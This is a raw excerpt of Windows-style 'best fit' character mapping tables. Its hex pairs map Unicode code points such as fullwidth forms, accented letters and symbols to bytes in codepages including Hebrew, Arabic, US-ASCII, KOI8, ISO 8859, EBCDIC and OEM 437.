01eb:6f 01ec:4f 01ed:6f 01f0:6a 0261:67 02b9:27 02ba:22 02bc:27 02c4:5e 02c7:5e 02c8:27 02cb:60 02cd:5f 02d8:5e 02d9:27 0300:60 0302:5e 0331:5f 0332:5f 04bb:68 0589:3a 066a:25 2000:20 2001:20 2002:20 2003:20 2004:20 2005:20 2006:20 2010:2d 2011:2d 2032:27 2035:60 203c:21 2044:2f 2074:34 2075:35 2076:36 2077:37 2078:38 2081:30 2084:34 2085:35 2086:36 2087:37 2088:38 2089:39 2102:43 2107:45 210a:67 210b:48 210c:48 210d:48 210e:68 2110:49 2111:49 2112:4c 2113:6c 2115:4e 2118:50 2119:50 211a:51 211b:52 211c:52 211d:52 2124:5a 2128:5a 212a:4b 212c:42 212d:43 212e:65 212f:65 2130:45 2131:46 2133:4d 2134:6f 2191:5e 2193:76 2194:2d 2195:7c 21a8:7c 2212:2d 2215:2f 2216:5c 2217:2a 221f:4c 2223:7c 2236:3a 223c:7e 2303:5e 2329:3c 232a:3e 2502:2d 250c:2d 2514:4c 2518:2d 251c:2b 2524:2b 252c:54 2534:2b 253c:2b 2550:3d 2554:2d 255a:4c 255d:2d 2566:54 256c:2b 2580:2d 2584:2d 2588:2d 2591:2d 2592:2d 2593:2d 25ac:2d 25b2:5e 25ba:3e 25c4:3c 25cb:30 25d9:30 263a:4f 263b:4f 263c:30 2640:2b 2642:3e 266a:64 266b:64 2758:7c 3000:20 3008:3c 3009:3e 301a:5b 301b:3d 301d:22 301e:22 ff01:21 ff02:22 ff03:23 ff04:24 ff05:25 ff06:26 ff07:27 ff08:28 ff09:29 ff0a:2a ff0b:2b ff0c:2c ff0d:2d ff0e:2e ff0f:2f ff10:30 ff11:31 ff12:32 ff13:33 ff14:34 ff15:35 ff16:36 ff17:37 ff18:38 ff19:39 ff1a:3a ff1b:3b ff1c:3c ff1d:3d ff1e:3e ff20:40 ff21:41 ff22:42 ff23:43 ff24:44 ff25:45 ff26:46 ff27:47 ff28:48 ff29:49 ff2a:4a ff2b:4b ff2c:4c ff2d:4d ff2e:4e ff2f:4f ff30:50 ff31:51 ff32:52 ff33:53 ff34:54 ff35:55 ff36:56 ff37:57 ff38:58 ff39:59 ff3a:5a ff3b:5b ff3c:5c ff3d:5d ff3e:5e ff3f:5f ff40:60 ff41:61 ff42:62 ff43:63 ff44:64 ff45:65 ff46:66 ff47:67 ff48:68 ff49:69 ff4a:6a ff4b:6b ff4c:6c ff4d:6d ff4e:6e ff4f:6f ff50:70 ff51:71 ff52:72 ff53:73 ff54:74 ff55:75 ff56:76 ff57:77 ff58:78 ff59:79 ff5a:7a ff5b:7b ff5c:7c ff5d:7d ff5e:7e 1255 (ANSI - Hebrew) 0191:46 ff01:21 ff02:22 ff03:23 ff04:24 ff05:25 ff06:26 ff07:27 ff08:28 ff09:29 ff0a:2a ff0b:2b ff0c:2c ff0d:2d ff0e:2e ff0f:2f ff10:30 ff11:31 ff12:32 ff13:33 ff14:34 ff15:35 ff16:36 ff17:37 ff18:38 ff19:39 ff1a:3a ff1b:3b ff1c:3c ff1d:3d ff1e:3e ff20:40 ff21:41 ff22:42 ff23:43 ff24:44 ff25:45 ff26:46 ff27:47 ff28:48 ff29:49 ff2a:4a ff2b:4b ff2c:4c ff2d:4d ff2e:4e ff2f:4f ff30:50 ff31:51 ff32:52 ff33:53 ff34:54 ff35:55 ff36:56 ff37:57 ff38:58 ff39:59 ff3a:5a ff3b:5b ff3c:5c ff3d:5d ff3e:5e ff3f:5f ff40:60 ff41:61 ff42:62 ff43:63 ff44:64 ff45:65 ff46:66 ff47:67 ff48:68 ff49:69 ff4a:6a ff4b:6b ff4c:6c ff4d:6d ff4e:6e ff4f:6f ff50:70 ff51:71 ff52:72 ff53:73 ff54:74 ff55:75 ff56:76 ff57:77 ff58:78 ff59:79 ff5a:7a ff5b:7b ff5c:7c ff5d:7d ff5e:7e 1256 (ANSI - Arabic) 0620:41 0621:41 0622:43 0623:45 0624:45 0625:45 0626:45 0627:49 0628:49 0629:4f 062a:55 062b:55 062c:55 062d:46 062e:43 062f:44 0630:45 0631:46 0632:47 0633:48 0634:49 0635:4a 0636:4b 0637:4c 0638:4d 0639:4e 063a:4f 0641:41 0642:42 0643:43 0644:44 0645:45 0646:46 0647:47 0648:48 0649:49 064a:4a 064b:4b 064c:4c 064d:4d 064e:4e 064f:4f 0650:50 0651:51 0652:52 1257 (ANSI - Baltic) ff01:21 ff02:22 ff03:23 ff04:24 ff05:25 ff06:26 ff07:27 ff08:28 ff09:29 ff0a:2a ff0b:2b ff0c:2c ff0d:2d ff0e:2e ff0f:2f ff10:30 ff11:31 ff12:32 ff13:33 ff14:34 ff15:35 ff16:36 ff17:37 ff18:38 ff19:39 ff1a:3a ff1b:3b ff1c:3c ff1d:3d ff1e:3e ff20:40 ff21:41 ff22:42 ff23:43 ff24:44 ff25:45 ff26:46 ff27:47 ff28:48 ff29:49 ff2a:4a ff2b:4b ff2c:4c ff2d:4d ff2e:4e ff2f:4f ff30:50 ff31:51 ff32:52 ff33:53 ff34:54 ff35:55 ff36:56 ff37:57 ff38:58 ff39:59 ff3a:5a ff3b:5b ff3c:5c ff3d:5d ff3e:5e ff3f:5f ff40:60 ff41:61 ff42:62 ff43:63 ff44:64 ff45:65 ff46:66 ff47:67 ff48:68 ff49:69 ff4a:6a ff4b:6b ff4c:6c ff4d:6d ff4e:6e ff4f:6f ff50:70 ff51:71 ff52:72 ff53:73 ff54:74 ff55:75 ff56:76 ff57:77 ff58:78 ff59:79 ff5a:7a ff5b:7b ff5c:7c ff5d:7d ff5e:7e 1258 (ANSI/OEM - Viet Nam) ff01:21 ff02:22 ff03:23 ff04:24 ff05:25 ff06:26 ff07:27 ff08:28 ff09:29 ff0a:2a ff0b:2b ff0c:2c ff0d:2d ff0e:2e ff0f:2f ff10:30 ff11:31 ff12:32 ff13:33 ff14:34 ff15:35 ff16:36 ff17:37 ff18:38 ff19:39 ff1a:3a ff1b:3b ff1c:3c ff1d:3d ff1e:3e ff20:40 ff21:41 ff22:42 ff23:43 ff24:44 ff25:45 ff26:46 ff27:47 ff28:48 ff29:49 ff2a:4a ff2b:4b ff2c:4c ff2d:4d ff2e:4e ff2f:4f ff30:50 ff31:51 ff32:52 ff33:53 ff34:54 ff35:55 ff36:56 ff37:57 ff38:58 ff39:59 ff3a:5a ff3b:5b ff3c:5c ff3d:5d ff3e:5e ff3f:5f ff40:60 ff41:61 ff42:62 ff43:63 ff44:64 ff45:65 ff46:66 ff47:67 ff48:68 ff49:69 ff4a:6a ff4b:6b ff4c:6c ff4d:6d ff4e:6e ff4f:6f ff50:70 ff51:71 ff52:72 ff53:73 ff54:74 ff55:75 ff56:76 ff57:77 ff58:78 ff59:79 ff5a:7a ff5b:7b ff5c:7c ff5d:7d ff5e:7e 20127 (US-ASCII) 00a0:20 00a1:21 00a2:63 00a4:24 00a5:59 00a6:7c 00a9:43 00aa:61 00ab:3c 00ad:2d 00ae:52 00b2:32 00b3:33 00b7:2e 00b8:2c 00b9:31 00ba:6f 00bb:3e 00c0:41 00c1:41 00c2:41 00c3:41 00c4:41 00c5:41 00c6:41 00c7:43 00c8:45 00c9:45 00ca:45 00cb:45 00cc:49 00cd:49 00ce:49 00cf:49 00d0:44 00d1:4e 00d2:4f 00d3:4f 00d4:4f 00d5:4f 00d6:4f 00d8:4f 00d9:55 00da:55 00db:55 00dc:55 00dd:59 00e0:61 00e1:61 00e2:61 00e3:61 00e4:61 00e5:61 00e6:61 00e7:63 00e8:65 00e9:65 00ea:65 00eb:65 00ec:69 00ed:69 00ee:69 00ef:69 00f1:6e 00f2:6f 00f3:6f 00f4:6f 00f5:6f 00f6:6f 00f8:6f 00f9:75 00fa:75 00fb:75 00fc:75 00fd:79 00ff:79 0100:41 0101:61 0102:41 0103:61 0104:41 0105:61 0106:43 0107:63 0108:43 0109:63 010a:43 010b:63 010c:43 010d:63 010e:44 010f:64 0110:44 0111:64 0112:45 0113:65 0114:45 0115:65 0116:45 0117:65 0118:45 0119:65 011a:45 011b:65 011c:47 011d:67 011e:47 011f:67 0120:47 0121:67 0122:47 0123:67 0124:48 0125:68 0126:48 0127:68 0128:49 0129:69 012a:49 012b:69 012c:49 012d:69 012e:49 012f:69 0130:49 0131:69 0134:4a 0135:6a 0136:4b 0137:6b 0139:4c 013a:6c 013b:4c 013c:6c 013d:4c 013e:6c 0141:4c 0142:6c 0143:4e 0144:6e 0145:4e 0146:6e 0147:4e 0148:6e 014c:4f 014d:6f 014e:4f 014f:6f 0150:4f 0151:6f 0152:4f 0153:6f 0154:52 0155:72 0156:52 0157:72 0158:52 0159:72 015a:53 015b:73 015c:53 015d:73 015e:53 015f:73 0160:53 0161:73 0162:54 0163:74 0164:54 0165:74 0166:54 0167:74 0168:55 0169:75 016a:55 016b:75 016c:55 016d:75 016e:55 016f:75 0170:55 0171:75 0172:55 0173:75 0174:57 0175:77 0176:59 0177:79 0178:59 0179:5a 017b:5a 017c:7a 017d:5a 017e:7a 0180:62 0189:44 0191:46 0192:66 0197:49 019a:6c 019f:4f 01a0:4f 01a1:6f 01ab:74 01ae:54 01af:55 01b0:75 01b6:7a 01cd:41 01ce:61 01cf:49 01d0:69 01d1:4f 01d2:6f 01d3:55 01d4:75 01d5:55 01d6:75 01d7:55 01d8:75 01d9:55 01da:75 01db:55 01dc:75 01de:41 01df:61 01e4:47 01e5:67 01e6:47 01e7:67 01e8:4b 01e9:6b 01ea:4f 01eb:6f 01ec:4f 01ed:6f 01f0:6a 0261:67 02b9:27 02ba:22 02bc:27 02c4:5e 02c6:5e 02c8:27 02cb:60 02cd:5f 02dc:7e 0300:60 0302:5e 0303:7e 030e:22 0331:5f 0332:5f 2000:20 2001:20 2002:20 2003:20 2004:20 2005:20 2006:20 2010:2d 2011:2d 2013:2d 2014:2d 2018:27 2019:27 201a:2c 201c:22 201d:22 201e:22 2022:2e 2026:2e 2032:27 2035:60 2039:3c 203a:3e 2122:54 ff01:21 ff02:22 ff03:23 ff04:24 ff05:25 ff06:26 ff07:27 ff08:28 ff09:29 ff0a:2a ff0b:2b ff0c:2c ff0d:2d ff0e:2e ff0f:2f ff10:30 ff11:31 ff12:32 ff13:33 ff14:34 ff15:35 ff16:36 ff17:37 ff18:38 ff19:39 ff1a:3a ff1b:3b ff1c:3c ff1d:3d ff1e:3e ff20:40 ff21:41 ff22:42 ff23:43 ff24:44 ff25:45 ff26:46 ff27:47 ff28:48 ff29:49 ff2a:4a ff2b:4b ff2c:4c ff2d:4d ff2e:4e ff2f:4f ff30:50 ff31:51 ff32:52 ff33:53 ff34:54 ff35:55 ff36:56 ff37:57 ff38:58 ff39:59 ff3a:5a ff3b:5b ff3c:5c ff3d:5d ff3e:5e ff3f:5f ff40:60 ff41:61 ff42:62 ff43:63 ff44:64 ff45:65 ff46:66 ff47:67 ff48:68 ff49:69 ff4a:6a ff4b:6b ff4c:6c ff4d:6d ff4e:6e ff4f:6f ff50:70 ff51:71 ff52:72 ff53:73 ff54:74 ff55:75 ff56:76 ff57:77 ff58:78 ff59:79 ff5a:7a ff5b:7b ff5c:7c ff5d:7d ff5e:7e 20261 (T.61) f8dd:5c f8de:5e f8df:60 f8e0:7b f8fc:7d f8fd:7e f8fe:7f 20866 (Russian - KOI8) 00a7:15 00ab:3c 00ad:2d 00ae:52 00b1:2b 00b6:14 00bb:3e 00c0:41 00c1:41 00c2:41 00c3:41 00c4:41 00c5:41 00c7:43 00c8:45 00c9:45 00ca:45 00cb:45 00cc:49 00cd:49 00ce:49 00cf:49 00d1:4e 00d2:4f 00d3:4f 00d4:4f 00d5:4f 00d6:4f 00d8:4f 00d9:55 00da:55 00db:55 00dc:55 00dd:59 00e0:61 00e1:61 00e2:61 00e3:61 00e4:61 00e5:61 00e7:63 00e8:65 00e9:65 00ea:65 00eb:65 00ec:69 00ed:69 00ee:69 00ef:69 00f1:6e 00f2:6f 00f3:6f 00f4:6f 00f5:6f 00f6:6f 00f8:6f 00f9:75 00fa:75 00fb:75 00fc:75 00fd:79 00ff:79 0100:41 0101:61 0102:41 0103:61 0104:41 0105:61 0106:43 0107:63 0108:43 0109:63 010a:43 010b:63 010c:43 010d:63 010e:44 010f:64 0110:44 0111:64 0112:45 0113:65 0114:45 0115:65 0116:45 0117:65 0118:45 0119:65 011a:45 011b:65 011c:47 011d:67 011e:47 011f:67 0120:47 0121:67 0122:47 0123:67 0124:48 0125:68 0126:48 0127:68 0128:49 0129:69 012a:49 012b:69 012c:49 012d:69 012e:49 012f:69 0130:49 0134:4a 0135:6a 0136:4b 0137:6b 0139:4c 013a:6c 013b:4c 013c:6c 013d:4c 013e:6c 0141:4c 0142:6c 0143:4e 0144:6e 0145:4e 0146:6e 0147:4e 0148:6e 014c:4f 014d:6f 014e:4f 014f:6f 0150:4f 0151:6f 0154:52 0155:72 0156:52 0157:72 0158:52 0159:72 015a:53 015b:73 015c:53 015d:73 015e:53 015f:73 0160:53 0161:73 0162:54 0163:74 0164:54 0165:74 0166:54 0167:74 0168:55 0169:75 016a:55 016b:75 016c:55 016d:75 016e:55 016f:75 0170:55 0171:75 0172:55 0173:75 0174:57 0175:77 0176:59 0177:79 0178:59 0179:5a 017b:5a 017c:7a 017d:5a 017e:7a 0180:62 0197:49 019a:6c 019f:4f 01a0:4f 01a1:6f 01ab:74 01ae:54 01af:55 01b0:75 01cd:41 01ce:61 01cf:49 01d0:69 01d1:4f 01d2:6f 01d3:55 01d4:75 01d5:55 01d6:75 01d7:55 01d8:75 01d9:55 01da:75 01db:55 01dc:75 01de:41 01df:61 01e4:47 01e5:67 01e6:47 01e7:67 01e8:4b 01e9:6b 01ea:4f 01eb:6f 01ec:4f 01ed:6f 01f0:6a 2013:2d 2014:2d 2018:27 2019:27 201a:27 201c:22 201d:22 201e:22 2022:07 2026:3a 2030:25 2039:3c 203a:3e 203c:13 2122:54 2190:1b 2191:18 2192:1a 2193:19 2194:1d 2195:12 21a8:17 221f:1c 2302:7f 25ac:16 25b2:1e 25ba:10 25bc:1f 25c4:11 25cb:09 25d8:08 25d9:0a 263a:01 263b:02 263c:0f 2640:0c 2642:0b 2660:06 2663:05 2665:03 2666:04 266a:0d 266b:0e 28591 (ISO 8859-1 Latin I) 0100:41 0101:61 0102:41 0103:61 0104:41 0105:61 0106:43 0107:63 0108:43 0109:63 010a:43 010b:63 010c:43 010d:63 010e:44 010f:64 0110:44 0111:64 0112:45 0113:65 0114:45 0115:65 0116:45 0117:65 0118:45 0119:65 011a:45 011b:65 011c:47 011d:67 011e:47 011f:67 0120:47 0121:67 0122:47 0123:67 0124:48 0125:68 0126:48 0127:68 0128:49 0129:69 012a:49 012b:69 012c:49 012d:69 012e:49 012f:69 0130:49 0131:69 0134:4a 0135:6a 0136:4b 0137:6b 0139:4c 013a:6c 013b:4c 013c:6c 013d:4c 013e:6c 0141:4c 0142:6c 0143:4e 0144:6e 0145:4e 0146:6e 0147:4e 0148:6e 014c:4f 014d:6f 014e:4f 014f:6f 0150:4f 0151:6f 0152:4f 0153:6f 0154:52 0155:72 0156:52 0157:72 0158:52 0159:72 015a:53 015b:73 015c:53 015d:73 015e:53 015f:73 0160:53 0161:73 0162:54 0163:74 0164:54 0165:74 0166:54 0167:74 0168:55 0169:75 016a:55 016b:75 016c:55 016d:75 016e:55 016f:75 0170:55 0171:75 0172:55 0173:75 0174:57 0175:77 0176:59 0177:79 0178:59 0179:5a 017b:5a 017c:7a 017d:5a 017e:7a 0180:62 0189:44 0191:46 0192:66 0197:49 019a:6c 019f:4f 01a0:4f 01a1:6f 01ab:74 01ae:54 01af:55 01b0:75 01b6:7a 01cd:41 01ce:61 01cf:49 01d0:69 01d1:4f 01d2:6f 01d3:55 01d4:75 01d5:55 01d6:75 01d7:55 01d8:75 01d9:55 01da:75 01db:55 01dc:75 01de:41 01df:61 01e4:47 01e5:67 01e6:47 01e7:67 01e8:4b 01e9:6b 01ea:4f 01eb:6f 01ec:4f 01ed:6f 01f0:6a 0261:67 02b9:27 02ba:22 02bc:27 02c4:5e 02c6:5e 02c8:27 02cb:60 02cd:5f 02dc:7e 0300:60 0302:5e 0303:7e 030e:22 0331:5f 0332:5f 2000:20 2001:20 2002:20 2003:20 2004:20 2005:20 2006:20 2010:2d 2011:2d 2013:2d 2014:2d 2018:27 2019:27 201a:2c 201c:22 201d:22 201e:22 2022:2e 2026:2e 2032:27 2035:60 2039:3c 203a:3e 2122:54 ff01:21 ff02:22 ff03:23 ff04:24 ff05:25 ff06:26 ff07:27 ff08:28 ff09:29 ff0a:2a ff0b:2b ff0c:2c ff0d:2d ff0e:2e ff0f:2f ff10:30 ff11:31 ff12:32 ff13:33 ff14:34 ff15:35 ff16:36 ff17:37 ff18:38 ff19:39 ff1a:3a ff1b:3b ff1c:3c ff1d:3d ff1e:3e ff20:40 ff21:41 ff22:42 ff23:43 ff24:44 ff25:45 ff26:46 ff27:47 ff28:48 ff29:49 ff2a:4a ff2b:4b ff2c:4c ff2d:4d ff2e:4e ff2f:4f ff30:50 ff31:51 ff32:52 ff33:53 ff34:54 ff35:55 ff36:56 ff37:57 ff38:58 ff39:59 ff3a:5a ff3b:5b ff3c:5c ff3d:5d ff3e:5e ff3f:5f ff40:60 ff41:61 ff42:62 ff43:63 ff44:64 ff45:65 ff46:66 ff47:67 ff48:68 ff49:69 ff4a:6a ff4b:6b ff4c:6c ff4d:6d ff4e:6e ff4f:6f ff50:70 ff51:71 ff52:72 ff53:73 ff54:74 ff55:75 ff56:76 ff57:77 ff58:78 ff59:79 ff5a:7a ff5b:7b ff5c:7c ff5d:7d ff5e:7e 28592 (ISO 8859-2 Central Europe) 00a1:21 00a2:63 00a5:59 00a6:7c 00a9:43 00aa:61 00ab:3c 00ae:52 00b2:32 00b3:33 00b7:2e 00b9:31 00ba:6f 00bb:3e 00c0:41 00c3:41 00c5:41 00c6:41 00c8:45 00ca:45 00cc:49 00cf:49 00d0:44 00d1:4e 00d2:4f 00d5:4f 00d8:4f 00d9:55 00db:55 00e0:61 00e3:61 00e5:61 00e6:61 00e8:65 00ea:65 00ec:69 00ef:69 00f1:6e 00f2:6f 00f5:6f 00f8:6f 00f9:75 00fb:75 00ff:79 0100:41 0101:61 0108:43 0109:63 010a:43 010b:63 0112:45 0113:65 0114:45 0115:65 0116:45 0117:65 011c:47 011d:67 011e:47 011f:67 0120:47 0121:67 0122:47 0123:67 0124:48 0125:68 0126:48 0127:68 0128:49 0129:69 012a:49 012b:69 012c:49 012d:69 012e:49 012f:69 0130:49 0131:69 0134:4a 0135:6a 0136:4b 0137:6b 013b:4c 013c:6c 0145:4e 0146:6e 014c:4f 014d:6f 014e:4f 014f:6f 0152:4f 0153:6f 0156:52 0157:72 015c:53 015d:73 0166:54 0167:74 0168:55 0169:75 016a:55 016b:75 016c:55 016d:75 0172:55 0173:75 0174:57 0175:77 0176:59 0177:79 0178:59 0180:62 0189:44 0191:46 0192:66 0197:49 019a:6c 019f:4f 01a0:4f 01a1:6f 01ab:74 01ae:54 01af:55 01b0:75 01b6:7a 01cd:41 01ce:61 01cf:49 01d0:69 01d1:4f 01d2:6f 01d3:55 01d4:75 01d5:55 01d6:75 01d7:55 01d8:75 01d9:55 01da:75 01db:55 01dc:75 01de:41 01df:61 01e4:47 01e5:67 01e6:47 01e7:67 01e8:4b 01e9:6b 01ea:4f 01eb:6f 01ec:4f 01ed:6f 01f0:6a 0261:67 02b9:27 02ba:22 02bc:27 02c4:5e 02c6:5e 02c8:27 02cb:60 02cd:5f 02dc:7e 0300:60 0302:5e 0303:7e 030e:22 0331:5f 0332:5f 2000:20 2001:20 2002:20 2003:20 2004:20 2005:20 2006:20 2010:2d 2011:2d 2013:2d 2014:2d 2018:27 2019:27 201a:2c 201c:22 201d:22 201e:22 2022:2e 2026:2e 2032:27 2035:60 2039:3c 203a:3e 2122:54 ff01:21 ff02:22 ff03:23 ff04:24 ff05:25 ff06:26 ff07:27 ff08:28 ff09:29 ff0a:2a ff0b:2b ff0c:2c ff0d:2d ff0e:2e ff0f:2f ff10:30 ff11:31 ff12:32 ff13:33 ff14:34 ff15:35 ff16:36 ff17:37 ff18:38 ff19:39 ff1a:3a ff1b:3b ff1c:3c ff1d:3d ff1e:3e ff20:40 ff21:41 ff22:42 ff23:43 ff24:44 ff25:45 ff26:46 ff27:47 ff28:48 ff29:49 ff2a:4a ff2b:4b ff2c:4c ff2d:4d ff2e:4e ff2f:4f ff30:50 ff31:51 ff32:52 ff33:53 ff34:54 ff35:55 ff36:56 ff37:57 ff38:58 ff39:59 ff3a:5a ff3b:5b ff3c:5c ff3d:5d ff3e:5e ff3f:5f ff40:60 ff41:61 ff42:62 ff43:63 ff44:64 ff45:65 ff46:66 ff47:67 ff48:68 ff49:69 ff4a:6a ff4b:6b ff4c:6c ff4d:6d ff4e:6e ff4f:6f ff50:70 ff51:71 ff52:72 ff53:73 ff54:74 ff55:75 ff56:76 ff57:77 ff58:78 ff59:79 ff5a:7a ff5b:7b ff5c:7c ff5d:7d ff5e:7e 28605 (ISO 8859-15 Latin 9) 00a6:7c 0100:41 0101:61 0102:41 0103:61 0104:41 0105:61 0106:43 0107:63 0108:43 0109:63 010a:43 010b:63 010c:43 010d:63 010e:44 010f:64 0112:45 0113:65 0114:45 0115:65 0116:45 0117:65 0118:45 0119:65 011a:45 011b:65 011c:47 011d:67 011e:47 011f:67 0120:47 0121:67 0122:47 0123:67 0124:48 0125:68 0126:48 0127:68 0128:49 0129:69 012a:49 012b:69 012c:49 012d:69 012e:49 012f:69 0130:49 0131:69 0134:4a 0135:6a 0136:4b 0137:6b 0138:6b 0139:4c 013a:6c 013b:4c 013c:6c 013d:4c 013e:6c 0141:4c 0142:6c 0143:4e 0144:6e 0145:4e 0146:6e 0147:4e 0148:6e 014a:4e 014b:6e 014c:4f 014d:6f 014e:4f 014f:6f 0150:4f 0151:6f 0154:52 0155:72 0156:52 0157:72 0158:52 0159:72 015a:53 015b:73 015c:53 015d:73 015e:53 015f:73 0162:54 0163:74 0164:54 0165:74 0166:54 0167:74 0168:54 0169:74 016a:55 016b:75 016c:55 016d:75 016e:55 016f:75 0170:55 0171:75 0172:55 0173:75 0174:57 0175:77 0176:59 0177:79 0179:5a 017b:5a 017c:7a 0180:62 0189:44 0191:46 0192:66 0197:49 019a:6c 019f:4f 01a0:4f 01a1:6f 01ab:74 01ae:54 01af:55 01b0:75 01b6:7a 01cd:41 01ce:61 01cf:49 01d0:69 01d1:4f 01d2:6f 01d3:55 01d4:75 01d5:55 01d6:75 01d7:55 01d8:75 01d9:55 01da:75 01db:55 01dc:75 01de:41 01df:61 01e4:47 01e5:67 01e6:47 01e7:67 01e8:4b 01e9:6b 01ea:4f 01eb:6f 01ec:4f 01ed:6f 01f0:6a 0261:67 02b9:27 02ba:22 02bc:27 02c4:5e 02c6:5e 02c8:27 02cb:60 02cd:5f 02dc:7e 0300:60 0302:5e 0303:7e 030e:22 0331:5f 0332:5f 2000:20 2001:20 2002:20 2003:20 2004:20 2005:20 2006:20 2010:2d 2011:2d 2013:2d 2014:2d 2018:27 2019:27 201a:2c 201c:22 201d:22 201e:22 2022:2e 2026:2e 2032:27 2035:60 2039:3c 203a:3e 2122:54 ff01:21 ff02:22 ff03:23 ff04:24 ff05:25 ff06:26 ff07:27 ff08:28 ff09:29 ff0a:2a ff0b:2b ff0c:2c ff0d:2d ff0e:2e ff0f:2f ff10:30 ff11:31 ff12:32 ff13:33 ff14:34 ff15:35 ff16:36 ff17:37 ff18:38 ff19:39 ff1a:3a ff1b:3b ff1c:3c ff1d:3d ff1e:3e ff20:40 ff21:41 ff22:42 ff23:43 ff24:44 ff25:45 ff26:46 ff27:47 ff28:48 ff29:49 ff2a:4a ff2b:4b ff2c:4c ff2d:4d ff2e:4e ff2f:4f ff30:50 ff31:51 ff32:52 ff33:53 ff34:54 ff35:55 ff36:56 ff37:57 ff38:58 ff39:59 ff3a:5a ff3b:5b ff3c:5c ff3d:5d ff3e:5e ff3f:5f ff40:60 ff41:61 ff42:62 ff43:63 ff44:64 ff45:65 ff46:66 ff47:67 ff48:68 ff49:69 ff4a:6a ff4b:6b ff4c:6c ff4d:6d ff4e:6e ff4f:6f ff50:70 ff51:71 ff52:72 ff53:73 ff54:74 ff55:75 ff56:76 ff57:77 ff58:78 ff59:79 ff5a:7a ff5b:7b ff5c:7c ff5d:7d ff5e:7e 37 (IBM EBCDIC - U.S./Canada) 0004:37 0005:2d 0006:2e 0007:2f 0008:16 0009:05 000a:25 0014:3c 0015:3d 0016:32 0017:26 001a:3f 001b:27 0020:40 0021:5a 0022:7f 0023:7b 0024:5b 0025:6c 0026:50 0027:7d 0028:4d 0029:5d 002a:5c 002b:4e 002c:6b 002d:60 002e:4b 002f:61 003a:7a 003b:5e 003c:4c 003d:7e 003e:6e 003f:6f 0040:7c 005f:6d 0060:79 007c:4f 007f:07 0080:20 0081:21 0082:22 0083:23 0084:24 0085:15 0086:06 0087:17 0088:28 0089:29 008a:2a 008b:2b 008c:2c 008d:09 008e:0a 008f:1b 0090:30 0091:31 0092:1a 0093:33 0094:34 0095:35 0096:36 0097:08 0098:38 0099:39 009a:3a 009b:3b 009c:04 009d:14 009e:3e 00a0:41 00a2:4a 00a6:6a 00ac:5f 00c0:64 00c1:65 00c2:62 00c3:66 00c4:63 00c5:67 00c7:68 00c8:74 00c9:71 00ca:72 00cb:73 00cc:78 00cd:75 00ce:76 00cf:77 00d1:69 00df:59 00e0:44 00e1:45 00e2:42 00e3:46 00e4:43 00e5:47 00e7:48 00e8:54 00e9:51 00ea:52 00eb:53 00ec:58 00ed:55 00ee:56 00ef:57 00f1:49 00f8:70 ff01:5a ff02:7f ff03:7b ff04:5b ff05:6c ff06:50 ff07:7d ff08:4d ff09:5d ff0a:5c ff0b:4e ff0c:6b ff0d:60 ff0e:4b ff0f:61 ff1a:7a ff1b:5e ff1c:4c ff1d:7e ff1e:6e ff20:7c ff3f:6d ff40:79 ff5c:4f 437 (OEM - United States) 00a4:0f 00a7:15 00a8:22 00a9:63 00ad:2d 00ae:72 00af:5f 00b3:33 00b4:27 00b6:14 00b8:2c 00b9:31 00be:5f 00c0:41 00c1:41 00c2:41 00c3:41 00c8:45 00ca:45 00cb:45 00cc:49 00cd:49 00ce:49 00cf:49 00d0:44 00d2:4f 00d3:4f 00d4:4f 00d5:4f 00d7:78 00d8:4f 00d9:55 00da:55 00db:55 00dd:59 00de:5f 00e3:61 00f0:64 00f5:6f 00f8:6f 00fd:79 00fe:5f 0100:41 0101:61 0102:41 0103:61 0104:41 0105:61 0106:43 0107:63 0108:43 0109:63 010a:43 010b:63 010c:43 010d:63 010e:44 010f:64 0110:44 0111:64 0112:45 0113:65 0114:45 0115:65 0116:45 0117:65 0118:45 0119:65 011a:45 011b:65 011c:47 011d:67 011e:47 011f:67 0120:47 0121:67 0122:47 0123:67 0124:48 0125:68 0126:48 0127:68 0128:49 0129:69 012a:49 012b:69 012c:49 012d:69 012e:49 012f:69 0130:49 0131:69 0134:4a 0135:6a 0136:4b 0137:6b 0139:4c 013a:6c 013b:4c 013c:6c 013d:4c 013e:6c 0141:4c 0142:6c 0143:4e 0144:6e 0145:4e 0146:6e 0147:4e 0148:6e 014c:4f 014d:6f 014e:4f 014f:6f 0150:4f 0151:6f 0152:4f 0153:6f 0154:52 0155:72 0156:52 0157:72 0158:52 0159:72 015a:53 015b:73 015c:53 015d:73 015e:53 015f:73 0160:53 0161:73 0162:54 0163:74 0164:54 0165:74 0166:54 0167:74 0168:55 0169:75 016a:55 016b:75 016c:55 016d:75 016e:55 016f:75 0170:55 0171:75 0172:55 0173:75 0174:57 0175:77 0176:59 0177:79 0178:59 0179:5a 017b:5a 017c:7a 017d:5a 017e:7a 0180:62 0189:44 0197:49 019a:6c 019f:4f 01a0:4f 01a1:6f 01ab:74 01ae:54 01af:55 01b0:75 01b6:7a 01c0:7c 01c3:21 01cd:41 01ce:61 01cf:49 01d0:69 01d1:4f 01d2:6f 01d3:55 01d4:75 01d5:55 01d6:75 01d7:55 01d8:75 01d9:55 01da:75 01db:55 01dc:75 01de:41 01df:61 01e4:47 01e5:67 01e6:47 01e7:67 01e8:4b 01e9:6b 01ea:4f 01eb:6f 01ec:4f 01ed:6f 01f0:6a 0261:67 02b9:27 02ba:22 02bc:27 02c4:5e 02c6:5e 02c8:27 02ca:27 02cb:60 02cd:5f 02dc:7e 0300:60 0301:27 0302:5e 0303:7e 0308:22 030e:22 0327:2c 0331:5f 0332:5f 037e:3b 04bb:68 0589:3a 066a:25 2000:20 2001:20 2002:20 2003:20 2004:20 2005:20 2006:20 2010:2d 2011:2d 2013:2d 2014:2d 2017:5f 2018:60 2019:27 201a:2c 201c:22 201d:22 201e:2c 2020:2b 2022:07 2026:2e 2030:25 2032:27 2035:60 2039:3c 203a:3e 203c:13 2044:2f 2074:34 2075:35 2076:36 2077:37 2078:38 2080:30 2081:31 2082:32 2083:33 2084:34 2085:35 2086:36 2087:37 2088:38 2089:39 20dd:09 2102:43 2107:45 210a:67 210b:48 210c:48 210d:48 210e:68 2110:49 2111:49 2112:4c 2113:6c 2115:4e 2118:50 2119:50 211a:51 211b:52 211c:52 211d:52 2122:54 2124:5a 2128:5a 212a:4b 212c:42 212d:43 212e:65 212f:65 2130:45 2131:46 2133:4d 2134:6f 2190:1b 2191:18 2192:1a 2193:19 2194:1d 2195:12 21a8:17 2212:2d 2215:2f 2216:5c 2217:2a 221f:1c 2223:7c 2236:3a 223c:7e 2302:7f 2303:5e 2329:3c 232a:3e 25ac:16 25b2:1e 25ba:10 25bc:1f 25c4:11 25cb:09 25d8:08 25d9:0a 263a:01 263b:02 263c:0f 2640:0c 2642:0b 2660:06 2663:05 